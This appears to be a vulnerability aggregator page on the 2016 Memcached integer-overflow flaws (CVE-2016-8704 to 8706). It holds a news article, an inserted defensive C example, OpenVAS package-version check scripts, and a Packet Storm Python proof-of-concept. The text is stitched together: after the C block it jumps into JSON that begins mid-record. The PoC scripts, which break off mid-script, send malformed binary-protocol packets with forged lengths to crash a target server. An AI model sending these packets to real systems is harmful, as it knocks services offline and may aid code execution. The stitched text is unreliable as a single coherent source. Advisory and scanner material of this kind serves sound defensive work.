Multiple Critical Remotely Exploitable Flaws Discovered in Memcached Caching System
2016-11-01T23:21:00
ID THN:0CB5E22FC1D91226BC56E430F1E31C62 Type thn Reporter Swati Khandelwal Modified 2016-11-02T10:21:37
Description
Hey Webmasters, are you using Memcached to boost the performance of your website?
Beware! It might be vulnerable to remote hackers.
Three critical Remote Code Execution vulnerabilities have been reported in Memcached by security researcher Aleksandar Nikolich at Cisco Talos Group that expose major websites, including Facebook, Twitter, YouTube, and Reddit, to hackers.
Memcached is a fabulous open-source distributed caching system that allows objects to be stored in memory. It is designed to speed up dynamic web applications by reducing load on the database, which helps administrators increase performance and scale web applications.
Memcached is widely used by thousands upon thousands of websites, including popular social networking sites such as Facebook, Flickr, Twitter, Reddit, YouTube, GitHub, and many more.
Nikolich says that he discovered multiple integer overflow bugs in Memcached that could be exploited to remotely run arbitrary code on the targeted system, thereby compromising the many websites that expose Memcached servers to the Internet.
The vulnerabilities actually reside in "various Memcached functions that are used in inserting, appending, prepending, or modifying key-value data pairs."
CVE-2016-8704: Memcached Server Append/Prepend Remote Code Execution Vulnerability
CVE-2016-8705: Memcached Server Update Remote Code Execution Vulnerability
CVE-2016-8706: Memcached Server SASL Authentication Remote Code Execution Vulnerability
Hackers Can Remotely Steal Sensitive Information
If exploited, the vulnerabilities could allow attackers to repeatedly send specially crafted Memcached commands to the targeted servers.
Moreover, the flaws could also be exploited to leak sensitive process information that can further be used to bypass standard exploitation mitigations, like ASLR (Address Space Layout Randomisation), making the attacks reliable and considerably "severe."
By default, the Memcached service installed on your server is available to the world on TCP port 11211, so it has always been strongly recommended to limit access to it to a trusted environment, behind a firewall.
So, if you have not yet updated your software to the latest release and your Memcached service is publicly accessible, an attacker can simply exploit these vulnerabilities to remotely steal sensitive information cached by the server without your knowledge.
What's even worse? These flaws could allow hackers to replace cached content with malicious content of their own in order to deface the website or serve phishing pages and malicious links to hijack victims' machines, placing hundreds of millions of online users at risk.
Patch your Memcached Server Now!
The integer overflow flaws in Memcached affect Memcached version 1.4.31 and earlier.
The researcher notified Memcached of the flaws, and the company took only two days to build a patch, on 31st October.
Memcached says the critical remote code execution flaws "are related to the binary protocol as well as SASL authentication of the binary protocol," but have been fixed in the latest release.
Customers are advised to apply the patch even to Memcached deployments in "trusted" environments, as attackers with existing access could target vulnerable servers to move laterally within those networks.
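The bug class this article describes, integer overflow in the length arithmetic of binary-protocol requests, is shown below as an added example; it is not code from Memcached or from the original article. It assumes the public 24-byte binary-protocol header layout; the struct, function names, sample headers and the 1 MiB `MAX_VALUE_LEN` cap are hypothetical choices made for this illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define BIN_HDR_LEN   24u             /* fixed size of a binary-protocol header */
#define BIN_MAGIC_REQ 0x80u           /* magic byte that marks a request */
#define MAX_VALUE_LEN (1024u * 1024u) /* assumed policy cap for this example */

/* Length-relevant header fields (hypothetical struct, not memcached's own). */
typedef struct {
    uint8_t  opcode;
    uint16_t keylen;   /* bytes 2-3, big-endian */
    uint8_t  extlen;   /* byte 4 */
    uint32_t bodylen;  /* bytes 8-11, big-endian: extras + key + value */
} bin_req;

typedef enum {
    REQ_OK = 0, REQ_TRUNCATED, REQ_BAD_MAGIC, REQ_LEN_MISMATCH, REQ_TOO_LARGE
} req_status;

static uint16_t rd_be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Constructed sample headers (unlisted trailing bytes are zero).
 * SAMPLE_OK:  Set (0x01), keylen 3, extlen 8, bodylen 16 -> value is 5 bytes.
 * SAMPLE_BAD: Append (0x0e), keylen 8, extlen 0, bodylen 4 -> key exceeds body. */
static const uint8_t SAMPLE_OK[BIN_HDR_LEN] = {
    0x80, 0x01, 0x00, 0x03, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10 };
static const uint8_t SAMPLE_BAD[BIN_HDR_LEN] = {
    0x80, 0x0e, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04 };

/* Extract the fields; this step alone says nothing about their consistency. */
req_status parse_bin_header(const uint8_t *buf, size_t len, bin_req *out)
{
    if (buf == NULL || out == NULL || len < BIN_HDR_LEN) return REQ_TRUNCATED;
    if (buf[0] != BIN_MAGIC_REQ) return REQ_BAD_MAGIC;
    out->opcode  = buf[1];
    out->keylen  = rd_be16(buf + 2);
    out->extlen  = buf[4];
    out->bodylen = rd_be32(buf + 8);
    return REQ_OK;
}

/* Pattern to avoid: subtracting client-supplied lengths without comparing
 * them first. If keylen + extlen > bodylen the result wraps to a huge value. */
uint32_t unchecked_value_len(const bin_req *r)
{
    return r->bodylen - (uint32_t)r->keylen - (uint32_t)r->extlen;
}

/* Hardened form: compare before subtracting, then enforce a size cap. */
req_status checked_value_len(const bin_req *r, uint32_t *vlen)
{
    /* At most 65535 + 255, so this sum cannot wrap a 32-bit integer. */
    uint32_t fixed = (uint32_t)r->keylen + (uint32_t)r->extlen;
    if (fixed > r->bodylen) return REQ_LEN_MISMATCH;
    if (r->bodylen - fixed > MAX_VALUE_LEN) return REQ_TOO_LARGE;
    *vlen = r->bodylen - fixed;
    return REQ_OK;
}

/* Append/prepend joins stored data with new data: test the sum against the
 * cap by subtraction so the addition itself can never overflow. */
req_status checked_append_len(uint32_t stored_len, uint32_t add_len, uint32_t *total)
{
    if (stored_len > MAX_VALUE_LEN || add_len > MAX_VALUE_LEN - stored_len)
        return REQ_TOO_LARGE;
    *total = stored_len + add_len;
    return REQ_OK;
}

int main(void)
{
    bin_req r;
    uint32_t vlen = 0;

    if (parse_bin_header(SAMPLE_OK, sizeof SAMPLE_OK, &r) == REQ_OK &&
        checked_value_len(&r, &vlen) == REQ_OK)
        printf("well-formed header: value length %u\n", (unsigned)vlen);

    if (parse_bin_header(SAMPLE_BAD, sizeof SAMPLE_BAD, &r) == REQ_OK) {
        printf("unchecked arithmetic yields %u\n", (unsigned)unchecked_value_len(&r));
        printf("checked arithmetic status %d (REQ_LEN_MISMATCH is %d)\n",
               (int)checked_value_len(&r, &vlen), (int)REQ_LEN_MISMATCH);
    }
    return 0;
}
```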
An attacker\ncould create a specially crafted message that would cause the memcached\nserver to crash or, potentially, execute arbitrary code. (CVE-2016-8706)\");\n script_tag(name:\"affected\", value:\"memcached on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:2819-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-November/msg00081.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"memcached\", rpm:\"memcached~1.4.15~10.el7_3.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"memcached-debuginfo\", rpm:\"memcached-debuginfo~1.4.15~10.el7_3.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-08T00:00:00", "id": "OPENVAS:1361412562310872102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872102", "type": "openvas", "title": "Fedora Update for memcached FEDORA-2016-0c4e822340", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for memcached FEDORA-2016-0c4e822340\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872102\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-08 09:37:31 +0100 (Thu, 08 Dec 2016)\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for memcached FEDORA-2016-0c4e822340\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'memcached'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"memcached 
on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0c4e822340\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OHVMADUSZTZ5AEK42ATRNAM5BESQKZ4W\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"memcached\", rpm:\"memcached~1.4.33~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "Multiple integer overflow vulnerabilities exist within Memcached that\n could be exploited to achieve remote code execution on the targeted system.", "modified": "2018-11-15T00:00:00", "published": "2016-11-02T00:00:00", "id": "OPENVAS:1361412562310140042", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140042", "type": "openvas", "title": "Memcached < 1.4.33 Multiple Remote Code Execution Vulnerabilities", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_memcached_1_4_33.nasl 12363 2018-11-15 09:51:15Z asteins $\n#\n# Memcached < 1.4.33 Multiple Remote Code Execution Vulnerabilities\n#\n# 
Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:memcached:memcached\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140042\");\n script_version(\"$Revision: 12363 $\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 10:51:15 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-02 14:57:47 +0100 (Wed, 02 Nov 2016)\");\n script_name(\"Memcached < 1.4.33 Multiple Remote Code Execution Vulnerabilities\");\n script_xref(name:\"URL\", value:\"https://github.com/memcached/memcached/wiki/ReleaseNotes1433\");\n script_xref(name:\"URL\", value:\"http://blog.talosintel.com/2016/10/memcached-vulnerabilities.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_memcached_detect.nasl\");\n script_mandatory_keys(\"Memcached/detected\");\n\n script_tag(name:\"affected\", 
value:\"Memcached < 1.4.33\");\n\n script_tag(name:\"insight\", value:\"These vulnerabilities manifest in various Memcached functions that are\n used in inserting, appending, prepending, or modifying key-value data pairs. Systems which also have\n Memcached compiled with support for SASL authentication are also vulnerable to a third flaw due to how\n Memcached handles SASL authentication commands.\");\n\n script_tag(name:\"solution\", value:\"Update to Memcached 1.4.33 or newer.\");\n\n script_tag(name:\"summary\", value:\"Multiple integer overflow vulnerabilities exist within Memcached that\n could be exploited to achieve remote code execution on the targeted system.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_proto( cpe:CPE, port:port ) ) exit( 0 );\n\nvers = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif( version_is_less( version:vers, test_version:\"1.4.33\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"1.4.33\" );\n security_message( port:port, proto:proto, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-11-08T00:00:00", "id": "OPENVAS:1361412562310842939", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842939", "type": "openvas", "title": "Ubuntu Update for memcached USN-3120-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for memcached 
USN-3120-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842939\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-08 15:52:55 +0530 (Tue, 08 Nov 2016)\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for memcached USN-3120-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'memcached'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Aleksandar Nikolic discovered that Memcached\n incorrectly handled certain malformed commands. 
A remote attacker could use\n this issue to cause Memcached to crash, resulting in a denial of service, or\n possibly execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"memcached on Ubuntu 16.04 LTS,\n Ubuntu 16.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3120-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3120-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS|16\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"memcached\", ver:\"1.4.14-0ubuntu9.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"memcached\", ver:\"1.4.13-0ubuntu2.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"memcached\", ver:\"1.4.25-2ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"memcached\", ver:\"1.4.25-2ubuntu2.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
(__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-02T00:00:00", "id": "OPENVAS:1361412562310810180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810180", "type": "openvas", "title": "Fedora Update for memcached FEDORA-2016-66c70cadb4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for memcached FEDORA-2016-66c70cadb4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810180\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 14:06:58 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for memcached FEDORA-2016-66c70cadb4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'memcached'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"memcached on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-66c70cadb4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ABVDYRA2YRJLUD7FAM67FCITWE6SEJ5I\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"memcached\", rpm:\"memcached~1.4.25~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-02T00:00:00", "id": "OPENVAS:1361412562310810158", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810158", "type": "openvas", "title": "Fedora Update for memcached FEDORA-2016-4df986a71f", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for memcached FEDORA-2016-4df986a71f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810158\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 14:06:52 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-8704\", \"CVE-2016-8705\", \"CVE-2016-8706\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for memcached FEDORA-2016-4df986a71f\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'memcached'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"memcached on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-4df986a71f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YOES3I7XILLXQDJSJ4YIUXUO4K46OOTD\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"memcached\", rpm:\"memcached~1.4.17~5.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:22", "description": "", "published": "2016-11-03T00:00:00", "type": "packetstorm", "title": "Memcached 1.4.33 Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8705", "CVE-2016-8704", "CVE-2016-8706"], "modified": "2016-11-03T00:00:00", "id": "PACKETSTORM:139572", "href": "https://packetstormsecurity.com/files/139572/Memcached-1.4.33-Proof-Of-Concept.html", "sourceData": "`# Source: http://paper.seebug.org/95/ \n \nimport struct \nimport socket \nimport sys \n \nMEMCACHED_REQUEST_MAGIC = \"\\x80\" \nOPCODE_PREPEND_Q = \"\\x1a\" \nkey_len = struct.pack(\"!H\",0xfa) \nextra_len = \"\\x00\" \ndata_type = \"\\x00\" \nvbucket = \"\\x00\\x00\" \nbody_len = struct.pack(\"!I\",0) \nopaque = struct.pack(\"!I\",0) \nCAS = struct.pack(\"!Q\",0) \nbody = \"A\"*1024 \n \nif len(sys.argv) != 3: \nprint \"./poc_crash.py <server> <port>\" \n \npacket = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len \npacket += data_type + vbucket + body_len + opaque + CAS \npacket += body \n \nset_packet = \"set testkey 0 60 4\\r\\ntest\\r\\n\" \nget_packet = \"get testkey\\r\\n\" \n \ns1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns1.connect((sys.argv[1],int(sys.argv[2]))) \ns1.sendall(set_packet) \nprint s1.recv(1024) \ns1.close() \n \n \ns2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns2.connect((sys.argv[1],int(sys.argv[2]))) \ns2.sendall(packet) \nprint s2.recv(1024) \ns2.close() \n \ns3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
\ns3.connect((sys.argv[1],int(sys.argv[2]))) \ns3.sendall(get_packet) \ns3.recv(1024) \ns3.close() \n \n \n========= \n \nimport struct \nimport socket \nimport sys \n \n \nMEMCACHED_REQUEST_MAGIC = \"\\x80\" \nOPCODE_ADD = \"\\x02\" \nkey_len = struct.pack(\"!H\",0xfa) \nextra_len = \"\\x08\" \ndata_type = \"\\x00\" \nvbucket = \"\\x00\\x00\" \nbody_len = struct.pack(\"!I\",0xffffffd0) \nopaque = struct.pack(\"!I\",0) \nCAS = struct.pack(\"!Q\",0) \nextras_flags = 0xdeadbeef \nextras_expiry = struct.pack(\"!I\",0xe10) \nbody = \"A\"*1024 \n \npacket = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len \npacket += data_type + vbucket + body_len + opaque + CAS \npacket += body \nif len(sys.argv) != 3: \nprint \"./poc_add.py <server> <port>\" \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((sys.argv[1],int(sys.argv[2]))) \ns.sendall(packet) \nprint s.recv(1024) \ns.close() \n \n========= \n \nimport struct \nimport socket \nimport sys \n \n \nMEMCACHED_REQUEST_MAGIC = \"\\x80\" 